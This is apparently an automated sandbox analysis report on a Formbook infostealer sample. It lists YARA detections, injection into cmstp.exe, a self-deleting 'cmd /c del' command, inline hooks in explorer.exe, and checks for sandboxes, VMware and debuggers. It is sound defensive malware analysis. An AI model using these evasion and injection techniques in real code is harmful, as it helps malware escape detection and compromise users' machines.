          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\20210113432.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20210113432.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
          Source: 20210113432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Customer] SET [Address] = @Address, [Postal_Code] = @Postal_Code, [Country] = @Country, [C_ID] = @C_ID, [C_City] = @C_City, [C_Phone] = @C_Phone WHERE (((@IsNull_Address = 1 AND [Address] IS NULL) OR ([Address] = @Original_Address)) AND ((@IsNull_Postal_Code = 1 AND [Postal_Code] IS NULL) OR ([Postal_Code] = @Original_Postal_Code)) AND ((@IsNull_Country = 1 AND [Country] IS NULL) OR ([Country] = @Original_Country)) AND ([C_ID] = @Original_C_ID) AND ((@IsNull_C_City = 1 AND [C_City] IS NULL) OR ([C_City] = @Original_C_City)) AND ((@IsNull_C_Phone = 1 AND [C_Phone] IS NULL) OR ([C_Phone] = @Original_C_Phone)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Invoice] ([C_ID], [INV_ID], [M_ID], [Services_Cost], [Inv_Date], [Electr_Cost], [Water_Cost], [Total_Cost]) VALUES (@C_ID, @INV_ID, @M_ID, @Services_Cost, @Inv_Date, @Electr_Cost, @Water_Cost, @Total_Cost);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method);
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Room_Type] ([TYPE_ID], [Name], [Description]) VALUES (@TYPE_ID, @Name, @Description); SELECT TYPE_ID, Name, Des
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method); SELECT M_ID, Method FROM Payment_Method WHERE (M_ID
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Services] ([Price], [Name], [Description], [Serv_Date], [S_ID]) VALUES (@Price, @Name, @Description, @Serv_Date, @S_ID);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Customer] ([Address], [Postal_Code], [Country], [C_ID], [C_City], [C_Phone]) VALUES (@Address, @Postal_Code, @Country, @C_ID, @C_City, @C_Phone);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Invoice] SET [C_ID] = @C_ID, [INV_ID] = @INV_ID, [M_ID] = @M_ID, [Services_Cost] = @Services_Cost, [Inv_Date] = @Inv_Date, [Electr_Cost] = @Electr_Cost, [Water_Cost] = @Water_Cost, [Total_Cost] = @Total_Cost WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ([INV_ID] = @Original_INV_ID) AND ((@IsNull_M_ID = 1 AND [M_ID] IS NULL) OR ([M_ID] = @Original_M_ID)) AND ((@IsNull_Services_Cost = 1 AND [Services_Cost] IS NULL) OR ([Services_Cost] = @Original_Services_Cost)) AND ((@IsNull_Inv_Date = 1 AND [Inv_Date] IS NULL) OR ([Inv_Date] = @Original_Inv_Date)) AND ((@IsNull_Electr_Cost = 1 AND [Electr_Cost] IS NULL) OR ([Electr_Cost] = @Original_Electr_Cost)) AND ((@IsNull_Water_Cost = 1 AND [Water_Cost] IS NULL) OR ([Water_Cost] = @Original_Water_Cost)) AND ((@IsNull_Total_Cost = 1 AND [Total_Cost] IS NULL) OR ([Total_Cost] = @Original_Total_Cost)));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Person] ([First_Name], [Last_Name], [SIN]) VALUES (@First_Name, @Last_Name, @SIN); SELECT First_Name, Last_Name
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Person] SET [First_Name] = @First_Name, [Last_Name] = @Last_Name, [SIN] = @SIN WHERE (((@IsNull_First_Name = 1 AND [First_Name] IS NULL) OR ([First_Name] = @Original_First_Name)) AND ((@IsNull_Last_Name = 1 AND [Last_Name] IS NULL) OR ([Last_Name] = @Original_Last_Name)) AND ([SIN] = @Original_SIN));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position); SELECT E_ID, Position FROM Employee WHERE (E_ID = @E_
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Payment_Method] SET [M_ID] = @M_ID, [Method] = @Method WHERE (([M_ID] = @Original_M_ID) AND ((@IsNull_Method = 1 AND [Method] IS NULL) OR ([Method] = @Original_Method)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Rooms] SET [R_ID] = @R_ID, [Price] = @Price, [Smoking_Allowed] = @Smoking_Allowed, [Description] = @Description, [Num_Of_Beds] = @Num_Of_Beds, [Floor] = @Floor WHERE (([R_ID] = @Original_R_ID) AND ((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Smoking_Allowed = 1 AND [Smoking_Allowed] IS NULL) OR ([Smoking_Allowed] = @Original_Smoking_Allowed)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Num_Of_Beds = 1 AND [Num_Of_Beds] IS NULL) OR ([Num_Of_Beds] = @Original_Num_Of_Beds)) AND ((@IsNull_Floor = 1 AND [Floor] IS NULL) OR ([Floor] = @Original_Floor)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Room_Type] SET [TYPE_ID] = @TYPE_ID, [Name] = @Name, [Description] = @Description WHERE (([TYPE_ID] = @Original_TYPE_ID) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Reservation] SET [C_ID] = @C_ID, [Date] = @Date, [RES_ID] = @RES_ID, [R_ID] = @R_ID, [Check_Out_Time] = @Check_Out_Time, [Check_In_Time] = @Check_In_Time WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ((@IsNull_Date = 1 AND [Date] IS NULL) OR ([Date] = @Original_Date)) AND ([RES_ID] = @Original_RES_ID) AND ((@IsNull_R_ID = 1 AND [R_ID] IS NULL) OR ([R_ID] = @Original_R_ID)) AND ((@IsNull_Check_Out_Time = 1 AND [Check_Out_Time] IS NULL) OR ([Check_Out_Time] = @Original_Check_Out_Time)) AND ((@IsNull_Check_In_Time = 1 AND [Check_In_Time] IS NULL) OR ([Check_In_Time] = @Original_Check_In_Time)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Employee] SET [E_ID] = @E_ID, [Position] = @Position WHERE (([E_ID] = @Original_E_ID) AND ((@IsNull_Position = 1 AND [Position] IS NULL) OR ([Position] = @Original_Position)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Services] SET [Price] = @Price, [Name] = @Name, [Description] = @Description, [Serv_Date] = @Serv_Date, [S_ID] = @S_ID WHERE (((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Serv_Date = 1 AND [Serv_Date] IS NULL) OR ([Serv_Date] = @Original_Serv_Date)) AND ([S_ID] = @Original_S_ID));
          Source: 20210113432.exeVirustotal: Detection: 28%
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\20210113432.exeProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 20210113432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 20210113432.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 20210113432.exeStatic file information: File size 1070592 > 1048576
          Source: 20210113432.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x104a00
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: 20210113432.exe, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.20210113432.exe.920000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.20210113432.exe.920000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.20210113432.exe.940000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.20210113432.exe.940000.1.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 0_2_0092DD3E push 6F060001h; iretd 0_2_0092DD52
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 0_2_0093862E push 00000000h; iretd 0_2_00938678
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 0_2_0092FB28 push 73000004h; retf 0_2_0092FB55
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_00417800 push ebp; retf 2_2_0041780B
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0040D8D8 push edi; retf 2_2_0040D8DD
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_00409B78 push ecx; ret 2_2_00409B80
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0040F3CD push FFFFFFB4h; ret 2_2_0040F3CF
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_00417BEA push 00000042h; retf 2_2_00417BEC
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_00409B78 push ecx; ret 2_2_00409B80
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041E47D push eax; ret 2_2_0041E5D4
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_00405DE5 pushfd ; iretd 2_2_00405DEE
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0041DFBD push 0000006Fh; ret 2_2_0041DFC1
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0094FB28 push 73000004h; retf 2_2_0094FB55
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0094DD3E push 6F060001h; iretd 2_2_0094DD52
          Source: C:\Users\user\Desktop\20210113432.exe | Code function: 2_2_0095862E push 00000000h; iretd 2_2_00958678
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0495D0D1 push ecx; ret 10_2_0495D0E4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0084D8D8 push edi; retf 10_2_0084D8DD
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_00857800 push ebp; retf 10_2_0085780B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0085D267 push ebx; ret 10_2_0085D275
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0084F3CD push FFFFFFB4h; ret 10_2_0084F3CF
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_00857BEA push 00000042h; retf 10_2_00857BEC
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_00849B78 push ecx; ret 10_2_00849B80
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0085E47D push eax; ret 10_2_0085E5D4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_00845DE5 pushfd ; iretd 10_2_00845DEE
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0085CEA5 push eax; ret 10_2_0085CEF8
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0085CEF2 push eax; ret 10_2_0085CEF8
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 10_2_0085CEFB push eax; ret 10_2_0085CF62
          Source: initial sample | Static PE information: section name: .text entropy: 7.02780570419

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE8
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 20210113432.exe PID: 1476, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\20210113432.exe; RDTSC instruction interceptor: First address: 00000000004098E4, second address: 00000000004098EA; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exe; RDTSC instruction interceptor: First address: 0000000000409B4E, second address: 0000000000409B54; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe; RDTSC instruction interceptor: First address: 00000000008498E4, second address: 00000000008498EA; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe; RDTSC instruction interceptor: First address: 0000000000849B4E, second address: 0000000000849B54; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\20210113432.exe; Code function: 2_2_00409A80 rdtsc (2_2_00409A80)
          Source: C:\Users\user\Desktop\20210113432.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\20210113432.exe TID: 4360; Thread sleep time: -52304s >= -30000s
          Source: C:\Users\user\Desktop\20210113432.exe TID: 1416; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6680; Thread sleep count: 51 > 30
          Source: C:\Windows\explorer.exe TID: 6680; Thread sleep time: -102000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5296; Thread sleep time: -110000s >= -30000s
          Source: C:\Windows\explorer.exe; Last function: Thread delayed (2 occurrences)
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.278109788.0000000008A32000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp; Binary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000000.268046635.00000000048E0000.00000004.00000001.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.278276930.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.623832514.00000000069DE000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.273368414.00000000059C0000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\20210113432.exe; Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\20210113432.exe; Process queried: DebugPort
